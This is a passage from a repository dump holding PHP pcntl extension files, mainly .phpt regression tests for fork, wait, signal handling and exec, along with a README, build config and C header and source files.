 56 | 	if (getenv("USE_ZEND_ALLOC") !== '0') {
 57 | 		var_dump(pcntl_sigprocmask(PHP_INT_MAX, array(SIGTERM)));
 58 | 	} else {
 59 | 		echo "Error triggered\n";
 60 | 		echo "bool(false)\n";
 61 | 	}
 62 | 	var_dump(pcntl_sigprocmask(SIG_SETMASK, array(0)));
 63 | 
 64 | 	echo "sigwaitinfo with invalid arguments\n";
 65 | 	var_dump(pcntl_sigwaitinfo(array(0)));
 66 | 
 67 | 	echo "sigtimedwait with invalid arguments\n";
 68 | 	var_dump(pcntl_sigtimedwait(array(SIGTERM), $signo, PHP_INT_MAX, PHP_INT_MAX));
 69 | } else {
 70 | 	$siginfo = NULL;
 71 | 	pcntl_sigtimedwait(array(SIGINT), $siginfo, 3600, 0);
 72 | 	exit;
 73 | }
 74 | 
 75 | ?>
 76 | --EXPECTF--
 77 | bool(true)
 78 | bool(true)
 79 | signo == SIGTERM
 80 | bool(true)
 81 | code === SI_USER || SI_NOINFO
 82 | bool(true)
 83 | signo == SIGCHLD
 84 | bool(true)
 85 | code === CLD_KILLED
 86 | bool(true)
 87 | signo === SIGCHLD
 88 | bool(true)
 89 | signo === uid
 90 | bool(true)
 91 | signo === pid
 92 | bool(true)
 93 | sigprocmask with invalid arguments
 94 | Error triggered
 95 | bool(false)
 96 | Error triggered
 97 | bool(false)
 98 | sigwaitinfo with invalid arguments
 99 | Error triggered
100 | bool(false)
101 | sigtimedwait with invalid arguments
102 | Error triggered
103 | int(-1)
104 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/003.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl: SIG_BLOCK, SIG_UNBLOCK, SIG_SETMASK
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
 6 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
 7 | 	elseif (!function_exists('pcntl_sigwaitinfo') or !function_exists('pcntl_sigtimedwait')) die('skip required functionality is not available');
 8 | ?>
 9 | --FILE--
10 | <?php
11 | 
12 | pcntl_sigprocmask(SIG_BLOCK, array(SIGCHLD,SIGTERM), $old);
13 | var_dump(count($old));
14 | pcntl_sigprocmask(SIG_BLOCK, array(SIGINT), $old);
15 | var_dump(count($old));
16 | pcntl_sigprocmask(SIG_UNBLOCK, array(SIGINT), $old);
17 | var_dump(count($old));
18 | pcntl_sigprocmask(SIG_SETMASK, array(SIGINT), $old);
19 | var_dump(count($old));
20 | pcntl_sigprocmask(SIG_SETMASK, array(), $old);
21 | var_dump(count($old));
22 | pcntl_sigprocmask(SIG_SETMASK, array(), $old);
23 | var_dump(count($old));
24 | 
25 | ?>
26 | --EXPECT--
27 | int(0)
28 | int(2)
29 | int(3)
30 | int(2)
31 | int(1)
32 | int(0)
33 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/bug47566.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Bug #47566 (return value of pcntl_wexitstatus())
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | --FILE--
 6 | <?php
 7 | $pid = pcntl_fork();
 8 | if ($pid == -1) {
 9 |  echo "Unable to fork";
10 |  exit;
11 | } elseif ($pid) {
12 |  $epid = pcntl_waitpid(-1,$status);
13 |  var_dump(pcntl_wexitstatus($status));
14 | } else {
15 |  exit(128);
16 | }
17 | ?>
18 | --EXPECT--
19 | int(128)
20 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_alarm.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_alarm()
 3 | --SKIPIF--
 4 | <?php if (!function_exists("pcntl_sigtimedwait")) die("skip pcntl_sigtimedwait() not available"); ?>
 5 | --INI--
 6 | max_execution_time=0
 7 | --FILE--
 8 | <?php
 9 | pcntl_signal(SIGALRM, function(){});
10 | 
11 | var_dump(pcntl_alarm());
12 | pcntl_alarm(0);
13 | var_dump(pcntl_alarm(60));
14 | var_dump(pcntl_alarm(1) > 0);
15 | $siginfo = array();
16 | var_dump(pcntl_sigtimedwait(array(SIGALRM),$siginfo,2) === SIGALRM);
17 | ?>
18 | --EXPECTF--
19 | Warning: pcntl_alarm() expects exactly 1 parameter, 0 given in %s
20 | NULL
21 | int(0)
22 | bool(true)
23 | bool(true)
24 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_exec.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec()
 3 | --SKIPIF--
 4 | <?php 
 5 | if (!extension_loaded("pcntl")) print "skip"; 
 6 | if (!getenv("TEST_PHP_EXECUTABLE") || !is_executable(getenv("TEST_PHP_EXECUTABLE"))) die("skip TEST_PHP_EXECUTABLE not set");
 7 | ?>
 8 | --FILE--
 9 | <?php
10 | echo "ok\n";
11 | pcntl_exec(getenv("TEST_PHP_EXECUTABLE"), ['-n']);
12 | echo "nok\n";
13 | ?>
14 | --EXPECT--
15 | ok
16 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_exec_2.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec() 2
 3 | --SKIPIF--
 4 | <?php
 5 | 
 6 | if (!extension_loaded("pcntl")) print "skip"; 
 7 | if (!getenv("TEST_PHP_EXECUTABLE") || !is_executable(getenv("TEST_PHP_EXECUTABLE"))) die("skip TEST_PHP_EXECUTABLE not set");
 8 | 
 9 | ?>
10 | --FILE--
11 | <?php
12 | if (getenv("PCNTL_EXEC_TEST_IS_CHILD")) {
13 | 	var_dump((binary)getenv("FOO"));
14 | 	exit;
15 | }
16 | echo "ok\n";
17 | pcntl_exec(getenv("TEST_PHP_EXECUTABLE"), array('-n', __FILE__), array(
18 | 	b"PCNTL_EXEC_TEST_IS_CHILD" => b"1", 
19 | 	b"FOO" => b"BAR",
20 | 	1 => b"long")
21 | );
22 | 
23 | echo "nok\n";
24 | ?>
25 | --EXPECT--
26 | ok
27 | string(3) "BAR"
28 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_exec_3.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec() 3
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | --FILE--
 6 | <?php
 7 | var_dump(pcntl_exec());
 8 | $file = tempnam(sys_get_temp_dir(),"php");
 9 | var_dump(pcntl_exec($file, array("foo","bar"), array("foo" => "bar")));
10 | unlink($file);
11 | ?>
12 | --EXPECTF--
13 | Warning: pcntl_exec() expects at least 1 parameter, 0 given %s
14 | NULL
15 | 
16 | Warning: pcntl_exec(): Error has occurred: (errno %d) %s
17 | bool(false)
18 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_fork_basic.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test function pcntl_fork() by calling it with its expected arguments
 3 | --CREDITS--
 4 | Marco Fabbri mrfabbri@gmail.com
 5 | Francesco Fullone ff@ideato.it
 6 | #PHPTestFest Cesena Italia on 2009-06-20
 7 | --SKIPIF--
 8 | <?php
 9 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
10 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
11 | ?>
12 | --FILE--
13 | <?php
14 | echo "*** Test by calling method or function with its expected arguments, first print the child PID and the father ***\n";
15 | 
16 | $pid = pcntl_fork();
17 | if ($pid > 0) {
18 | 	pcntl_wait($status); 
19 | 	var_dump($pid);
20 | } else {
21 | 	var_dump($pid);
22 | }
23 | ?>
24 | --EXPECTF--
25 | *** Test by calling method or function with its expected arguments, first print the child PID and the father ***
26 | int(0)
27 | int(%d)
28 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_fork_variation.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test function pcntl_fork() by testing the process isolation in the forking hierarchy father -> son -> grandson where father can not knows his grandson
 3 | --CREDITS--
 4 | Marco Fabbri mrfabbri@gmail.com
 5 | Francesco Fullone ff@ideato.it
 6 | #PHPTestFest Cesena Italia on 2009-06-20
 7 | --SKIPIF--
 8 | <?php
 9 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
10 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
11 | ?>
12 | --FILE--
13 | <?php
14 | echo "*** Testing the process isolations between a process and its forks ***\n";
15 | 
16 | $pid = pcntl_fork();
17 | 
18 | if ($pid > 0) {
19 |   pcntl_wait($status); 
20 |   echo "father is $pid\n";
21 | 
22 |   if (!isset($pid2)) 
23 |   {
24 |     echo "father ($pid) doesn't know its grandsons\n";
25 |   }
26 | } 
27 | else 
28 | {
29 |   echo "son ($pid)\n";
30 |   $pid2 = pcntl_fork();
31 |   if ($pid2 > 0)
32 |   {	
33 |     pcntl_wait($status2); 
34 |     echo "son is father of $pid2\n";
35 |   } 
36 |   else 
37 |   {
38 |     echo "grandson ($pid2)\n";
39 |   }
40 | }
41 | ?>
42 | --EXPECTF--
43 | *** Testing the process isolations between a process and its forks ***
44 | son (0)
45 | grandson (0)
46 | son is father of %d
47 | father is %d
48 | father (%d) doesn't know its grandsons
49 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_get_last_error.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test pcntl_get_last_error()
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | ?>
 7 | --FILE--
 8 | <?php 
 9 | var_dump(pcntl_get_last_error());
10 | $pid = pcntl_wait($status);
11 | var_dump($pid);
12 | var_dump(pcntl_get_last_error() == PCNTL_ECHILD);
13 | ?>
14 | --EXPECT--
15 | int(0)
16 | int(-1)
17 | bool(true)
18 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_signal.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_signal()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | pcntl_signal(SIGTERM, function($signo){
 9 | 	echo "signal dispatched\n";
10 | });
11 | posix_kill(posix_getpid(), SIGTERM);
12 | pcntl_signal_dispatch();
13 | 
14 | var_dump(pcntl_signal());
15 | var_dump(pcntl_signal(SIGALRM, SIG_IGN));
16 | var_dump(pcntl_signal(-1, -1));
17 | var_dump(pcntl_signal(-1, function(){}));
18 | var_dump(pcntl_signal(SIGALRM, "not callable"));
19 | 
20 | 
21 | /* test freeing queue in RSHUTDOWN */
22 | posix_kill(posix_getpid(), SIGTERM);
23 | echo "ok\n";
24 | ?>
25 | --EXPECTF--
26 | signal dispatched
27 | 
28 | Warning: pcntl_signal() expects at least 2 parameters, 0 given in %s
29 | NULL
30 | bool(true)
31 | 
32 | Warning: pcntl_signal(): Invalid signal %s
33 | bool(false)
34 | 
35 | Warning: pcntl_signal(): Invalid signal %s
36 | bool(false)
37 | 
38 | Warning: pcntl_signal(): not callable is not a callable function name error in %s
39 | bool(false)
40 | ok
41 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_signal_dispatch.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcnt_signal_dispatch()
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("pcntl_signal_dispatch")) print "skip pcntl_signal_dispatch() not available";
 8 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 9 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
10 | ?>
11 | --FILE--
12 | <?php
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | pcntl_signal_dispatch();
20 | echo "Done!\n";
21 | 
22 | ?>
23 | --EXPECTF--
24 | Start!
25 | Signal handler called!
26 | Done!
27 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/pcntl_wait.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_wait()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | $pid = pcntl_fork();
 9 | if ($pid == 1) {
10 | 	die("failed");
11 | } else if ($pid) {
12 | 	$status = 0;
13 | 	pcntl_wait($status, WUNTRACED);
14 | 	var_dump(pcntl_wifexited($status));
15 | 	posix_kill($pid, SIGCONT);
16 | 
17 | 	pcntl_wait($status);
18 | 	var_dump(pcntl_wifsignaled($status));
19 | 	var_dump(pcntl_wifstopped($status));
20 | 	var_dump(pcntl_wexitstatus($status));
21 | 
22 | 	var_dump(pcntl_wait($status, WNOHANG | WUNTRACED));
23 | 	var_dump(pcntl_wait());
24 | 	var_dump(pcntl_waitpid());
25 | 
26 | 	var_dump(pcntl_wifexited());
27 | 	var_dump(pcntl_wifstopped());
28 | 	var_dump(pcntl_wifsignaled());
29 | 	var_dump(pcntl_wexitstatus());
30 | 	var_dump(pcntl_wtermsig());
31 | 	var_dump(pcntl_wstopsig());
32 | } else {
33 | 	posix_kill(posix_getpid(), SIGSTOP);
34 | 	exit(42);
35 | }
36 | ?>
37 | --EXPECTF--
38 | bool(false)
39 | bool(false)
40 | bool(false)
41 | int(42)
42 | int(-1)
43 | 
44 | Warning: pcntl_wait() expects at least 1 parameter, 0 given in %s
45 | NULL
46 | 
47 | Warning: pcntl_waitpid() expects at least 2 parameters, 0 given in %s
48 | NULL
49 | 
50 | Warning: pcntl_wifexited() expects exactly 1 parameter, 0 given in %s
51 | NULL
52 | 
53 | Warning: pcntl_wifstopped() expects exactly 1 parameter, 0 given in %s
54 | NULL
55 | 
56 | Warning: pcntl_wifsignaled() expects exactly 1 parameter, 0 given in %s
57 | NULL
58 | 
59 | Warning: pcntl_wexitstatus() expects exactly 1 parameter, 0 given in %s
60 | NULL
61 | 
62 | Warning: pcntl_wtermsig() expects exactly 1 parameter, 0 given in %s
63 | NULL
64 | 
65 | Warning: pcntl_wstopsig() expects exactly 1 parameter, 0 given in %s
66 | NULL
67 | 


--------------------------------------------------------------------------------
/Lib/pcntl54/tests/signal_closure_handler.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Closures as a signal handler
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 8 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
 9 | ?>
10 | --FILE--
11 | <?php
12 | declare (ticks = 1);
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | echo "Done!\n";
20 | 
21 | ?>
22 | --EXPECTF--
23 | Start!
24 | Signal handler called!
25 | Done!
26 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/README:
--------------------------------------------------------------------------------
 1 | Process Control Module for PHP (pcntl)
 2 | 
 3 | This module will attempt to implement all features related to process spawning and
 4 | control (fork(), waitpid(), signal(), WIF's, etc). This is extremely experimental, 
 5 | with hope to become stable on most UNIX's. I greatly apreciate any feedback, fixes, 
 6 | and or suggestions on how to improve/better implement
 7 | this functionality.
 8 | 
 9 | Thanks,
10 | 
11 | Jason Greeme < jason@inetgurus.net / jason@php.net >
12 | 
13 | 
14 | 
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/config.m4:
--------------------------------------------------------------------------------
 1 | dnl
 2 | dnl $Id$
 3 | dnl
 4 | 
 5 | PHP_ARG_ENABLE(pcntl, whether to enable pcntl support,
 6 | [  --enable-pcntl          Enable pcntl support (CLI/CGI only)])
 7 | 
 8 | if test "$PHP_PCNTL" != "no"; then
 9 |   AC_CHECK_FUNCS(fork, [ AC_DEFINE(HAVE_FORK,1,[ ]) ], [ AC_MSG_ERROR(pcntl: fork() not supported by this platform) ])
10 |   AC_CHECK_FUNCS(waitpid, [ AC_DEFINE(HAVE_WAITPID,1,[ ]) ], [ AC_MSG_ERROR(pcntl: waitpid() not supported by this platform) ])
11 |   AC_CHECK_FUNCS(sigaction, [ AC_DEFINE(HAVE_SIGACTION,1,[ ]) ], [ AC_MSG_ERROR(pcntl: sigaction() not supported by this platform) ])
12 |   AC_CHECK_FUNCS([getpriority setpriority wait3 sigprocmask sigwaitinfo sigtimedwait])
13 |   PHP_NEW_EXTENSION(pcntl, pcntl.c php_signal.c, $ext_shared, cli)
14 | fi
15 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/package.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/pcntl56/package.xml


--------------------------------------------------------------------------------
/Lib/pcntl56/php_pcntl.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 5                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2016 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 |  */
18 | 
19 | /* $Id$ */
20 | 
21 | #ifndef PHP_PCNTL_H
22 | #define PHP_PCNTL_H
23 | 
24 | extern zend_module_entry pcntl_module_entry;
25 | #define phpext_pcntl_ptr &pcntl_module_entry
26 | 
27 | PHP_MINIT_FUNCTION(pcntl);
28 | PHP_MSHUTDOWN_FUNCTION(pcntl);
29 | PHP_RINIT_FUNCTION(pcntl);
30 | PHP_RSHUTDOWN_FUNCTION(pcntl);
31 | PHP_MINFO_FUNCTION(pcntl);
32 | 
33 | PHP_FUNCTION(pcntl_alarm);
34 | PHP_FUNCTION(pcntl_fork);
35 | PHP_FUNCTION(pcntl_waitpid);
36 | PHP_FUNCTION(pcntl_wait);
37 | PHP_FUNCTION(pcntl_wifexited);
38 | PHP_FUNCTION(pcntl_wifstopped);
39 | PHP_FUNCTION(pcntl_wifsignaled);
40 | PHP_FUNCTION(pcntl_wexitstatus);
41 | PHP_FUNCTION(pcntl_wtermsig);
42 | PHP_FUNCTION(pcntl_wstopsig);
43 | PHP_FUNCTION(pcntl_signal);
44 | PHP_FUNCTION(pcntl_signal_dispatch);
45 | PHP_FUNCTION(pcntl_get_last_error);
46 | PHP_FUNCTION(pcntl_strerror);
47 | #ifdef HAVE_SIGPROCMASK
48 | PHP_FUNCTION(pcntl_sigprocmask);
49 | #endif
50 | #if HAVE_SIGWAITINFO && HAVE_SIGTIMEDWAIT
51 | PHP_FUNCTION(pcntl_sigwaitinfo);
52 | PHP_FUNCTION(pcntl_sigtimedwait);
53 | #endif
54 | PHP_FUNCTION(pcntl_exec);
55 | #ifdef HAVE_GETPRIORITY
56 | PHP_FUNCTION(pcntl_getpriority);
57 | #endif
58 | #ifdef HAVE_SETPRIORITY
59 | PHP_FUNCTION(pcntl_setpriority);
60 | #endif
61 | 
62 | struct php_pcntl_pending_signal {
63 | 	struct php_pcntl_pending_signal *next;
64 | 	long signo;
65 | };
66 | 
67 | ZEND_BEGIN_MODULE_GLOBALS(pcntl)
68 | 	HashTable php_signal_table;
69 | 	int processing_signal_queue;
70 | 	struct php_pcntl_pending_signal *head, *tail, *spares;
71 | 	int last_error;
72 | 	volatile char pending_signals;
73 | ZEND_END_MODULE_GLOBALS(pcntl)
74 | 
75 | #ifdef ZTS
76 | #define PCNTL_G(v) TSRMG(pcntl_globals_id, zend_pcntl_globals *, v)
77 | #else
78 | #define PCNTL_G(v)	(pcntl_globals.v)
79 | #endif
80 | 
81 | #define REGISTER_PCNTL_ERRNO_CONSTANT(name) REGISTER_LONG_CONSTANT("PCNTL_" #name, name, CONST_CS | CONST_PERSISTENT)
82 | 
83 | #endif	/* PHP_PCNTL_H */
84 | 
85 | 
86 | /*
87 |  * Local variables:
88 |  * tab-width: 4
89 |  * c-basic-offset: 4
90 |  * indent-tabs-mode: t
91 |  * End:
92 |  */
93 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/php_signal.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 5                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2016 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id$ */
20 | 
21 | #include "TSRM.h"
22 | #include "php_signal.h"
23 | #include "Zend/zend.h"
24 | #include "Zend/zend_signal.h"
25 | 
26 | /* php_signal using sigaction is derived from Advanced Programing
27 |  * in the Unix Environment by W. Richard Stevens p 298. */
28 | Sigfunc *php_signal4(int signo, Sigfunc *func, int restart, int mask_all)
29 | {
30 | 	struct sigaction act,oact;
31 | #ifdef ZEND_SIGNALS
32 | 	TSRMLS_FETCH();
33 | #endif
34 | 	act.sa_handler = func;
35 | 	if (mask_all) {
36 | 		sigfillset(&act.sa_mask);
37 | 	} else {
38 | 		sigemptyset(&act.sa_mask);
39 | 	}
40 | 	act.sa_flags = 0;
41 | 	if (signo == SIGALRM || (! restart)) {
42 | #ifdef SA_INTERRUPT
43 | 		act.sa_flags |= SA_INTERRUPT; /* SunOS */
44 | #endif
45 | 	} else {
46 | #ifdef SA_RESTART
47 | 		act.sa_flags |= SA_RESTART; /* SVR4, 4.3+BSD */
48 | #endif
49 | 	}
50 | #ifdef ZEND_SIGNALS
51 | 	if (zend_sigaction(signo, &act, &oact TSRMLS_CC) < 0)
52 | #else
53 | 	if (sigaction(signo, &act, &oact) < 0)
54 | #endif
55 | 	{
56 | 		return SIG_ERR;
57 | 	}
58 |  
59 | 	return oact.sa_handler;
60 | }
61 | 
62 | Sigfunc *php_signal(int signo, Sigfunc *func, int restart)
63 | {
64 | 	return php_signal4(signo, func, restart, 0);
65 | }
66 | 
67 | /*
68 |  * Local variables:
69 |  * tab-width: 4
70 |  * c-basic-offset: 4
71 |  * End:
72 |  * vim600: noet sw=4 ts=4 fdm=marker
73 |  * vim<600: noet sw=4 ts=4
74 |  */
75 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/php_signal.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 5                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2016 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id$ */
20 | 
21 | #include <signal.h>
22 | #ifndef PHP_SIGNAL_H
23 | #define PHP_SIGNAL_H
24 | 
25 | #ifndef NSIG
26 | # define NSIG 32
27 | #endif
28 | #ifndef SIGRTMAX
29 | # define SIGRTMAX 64
30 | #endif
31 | 
32 | typedef void Sigfunc(int);
33 | Sigfunc *php_signal(int signo, Sigfunc *func, int restart);
34 | Sigfunc *php_signal4(int signo, Sigfunc *func, int restart, int mask_all);
35 | 
36 | #endif
37 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/001.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test pcntl wait functionality
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 7 | ?>
 8 | --FILE--
 9 | <?php 
10 | function test_exit_waits(){
11 | 	print "\n\nTesting pcntl_wifexited and wexitstatus....";
12 | 
13 | 	$pid=pcntl_fork();
14 | 	if ($pid==0) {
15 | 		sleep(1);
16 | 		exit(-1);
17 | 	} else {
18 | 		$options=0;
19 | 		pcntl_waitpid($pid, $status, $options);
20 | 		if ( pcntl_wifexited($status) ) print "\nExited With: ". pcntl_wexitstatus($status);
21 | 	}
22 | }
23 | 
24 | function test_exit_signal(){
25 | 	print "\n\nTesting pcntl_wifsignaled....";
26 | 
27 | 	$pid=pcntl_fork();
28 |     
29 | 	if ($pid==0) {
30 | 		sleep(10);
31 | 		exit;
32 | 	} else {
33 | 		$options=0;
34 | 		posix_kill($pid, SIGTERM);
35 | 		pcntl_waitpid($pid, $status, $options);
36 | 		if ( pcntl_wifsignaled($status) ) {
37 | 			$signal_print=pcntl_wtermsig($status);
38 | 			if ($signal_print==SIGTERM) $signal_print="SIGTERM";
39 | 			print "\nProcess was terminated by signal : ". $signal_print;
40 | 		}
41 | 
42 | 	}
43 | }
44 | 
45 | 
46 | function test_stop_signal(){
47 | 	print "\n\nTesting pcntl_wifstopped and pcntl_wstopsig....";
48 | 
49 | 	$pid=pcntl_fork();
50 |     
51 | 	if ($pid==0) {
52 | 		sleep(1);
53 | 		exit;
54 | 	} else {
55 | 		$options=WUNTRACED;
56 | 		posix_kill($pid, SIGSTOP);
57 | 		pcntl_waitpid($pid, $status, $options);
58 | 		if ( pcntl_wifstopped($status) ) {
59 | 			$signal_print=pcntl_wstopsig($status);
60 | 			if ($signal_print==SIGSTOP) $signal_print="SIGSTOP";
61 | 			print "\nProcess was stoped by signal : ". $signal_print;
62 | 		}
63 | 		posix_kill($pid, SIGCONT);
64 | 	}
65 | }
66 | 
67 | print "Staring wait.h tests....";
68 | test_exit_waits();
69 | test_exit_signal();
70 | test_stop_signal();
71 | ?>
72 | --EXPECT--
73 | Staring wait.h tests....
74 | 
75 | Testing pcntl_wifexited and wexitstatus....
76 | Exited With: 255
77 | 
78 | Testing pcntl_wifsignaled....
79 | Process was terminated by signal : SIGTERM
80 | 
81 | Testing pcntl_wifstopped and pcntl_wstopsig....
82 | Process was stoped by signal : SIGSTOP
83 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_exec.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec()
 3 | --SKIPIF--
 4 | <?php 
 5 | if (!extension_loaded("pcntl")) print "skip"; 
 6 | if (!getenv("TEST_PHP_EXECUTABLE") || !is_executable(getenv("TEST_PHP_EXECUTABLE"))) die("skip TEST_PHP_EXECUTABLE not set");
 7 | ?>
 8 | --FILE--
 9 | <?php
10 | echo "ok\n";
11 | pcntl_exec(getenv("TEST_PHP_EXECUTABLE"), ['-n']);
12 | echo "nok\n";
13 | ?>
14 | --EXPECT--
15 | ok
16 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_exec_2.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec() 2
 3 | --SKIPIF--
 4 | <?php
 5 | 
 6 | if (!extension_loaded("pcntl")) print "skip"; 
 7 | if (!getenv("TEST_PHP_EXECUTABLE") || !is_executable(getenv("TEST_PHP_EXECUTABLE"))) die("skip TEST_PHP_EXECUTABLE not set");
 8 | 
 9 | ?>
10 | --FILE--
11 | <?php
12 | if (getenv("PCNTL_EXEC_TEST_IS_CHILD")) {
13 | 	var_dump((binary)getenv("FOO"));
14 | 	exit;
15 | }
16 | echo "ok\n";
17 | pcntl_exec(getenv("TEST_PHP_EXECUTABLE"), array('-n', __FILE__), array(
18 | 	b"PCNTL_EXEC_TEST_IS_CHILD" => b"1", 
19 | 	b"FOO" => b"BAR",
20 | 	1 => b"long")
21 | );
22 | 
23 | echo "nok\n";
24 | ?>
25 | --EXPECT--
26 | ok
27 | string(3) "BAR"
28 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_fork_basic.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test function pcntl_fork() by calling it with its expected arguments
 3 | --CREDITS--
 4 | Marco Fabbri mrfabbri@gmail.com
 5 | Francesco Fullone ff@ideato.it
 6 | #PHPTestFest Cesena Italia on 2009-06-20
 7 | --SKIPIF--
 8 | <?php
 9 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
10 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
11 | ?>
